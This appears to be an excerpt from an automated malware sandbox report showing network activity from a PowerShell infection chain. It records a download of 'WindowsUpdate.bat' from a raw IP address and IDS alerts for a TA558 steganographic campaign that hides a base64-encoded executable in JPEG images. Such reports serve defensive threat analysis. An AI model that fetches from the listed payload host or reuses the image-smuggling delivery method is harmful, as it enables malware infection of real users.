7040powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_a2ygdvwz.4hk.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
49
TCP/UDP connections
50
DNS requests
18
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5944
MoUsoCoreWorker.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
5944
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
3944
RUXIMICS.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
1268
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
NL
binary
814 b
whitelisted
POST
200
40.126.31.131:443
https://login.live.com/RST2.srf
US
xml
1.24 Kb
unknown
POST
400
20.190.159.130:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
unknown
POST
400
20.190.159.130:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
unknown
4832
powershell.exe
GET
200
206.82.9.203:80
http://206.82.9.203/WindowsUpdate.bat
US
text
9.74 Kb
unknown
POST
400
40.126.31.3:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
unknown
POST
400
40.126.31.3:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1268
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3944
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5944
MoUsoCoreWorker.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5944
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
3944
RUXIMICS.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
1268
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
5944
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.238
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
login.live.com
  • 20.190.159.71
  • 40.126.31.69
  • 20.190.159.4
  • 40.126.31.2
  • 40.126.31.67
  • 40.126.31.3
  • 40.126.31.73
  • 40.126.31.131
whitelisted
i.ibb.co
  • 45.43.142.2
  • 45.43.142.6
  • 45.43.142.4
  • 45.43.142.7
  • 45.43.142.5
  • 45.43.142.3
shared
bitbucket.org
  • 185.166.143.50
  • 185.166.143.49
  • 185.166.143.48
whitelisted
slscr.update.microsoft.com
  • 74.179.77.204
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
self.events.data.microsoft.com
  • 20.42.65.89
whitelisted

Threats

PID
Process
Class
Message
4832
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
6664
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
A Network Trojan was detected
ET MALWARE ReverseLoader Reverse Base64 Encoded Executable In Image M2
1936
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
A Network Trojan was detected
ET MALWARE ReverseLoader Reverse Base64 Encoded Executable In Image M2
1336
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5968
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Image hosting service ImgBB
A Network Trojan was detected
PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558)
No debug info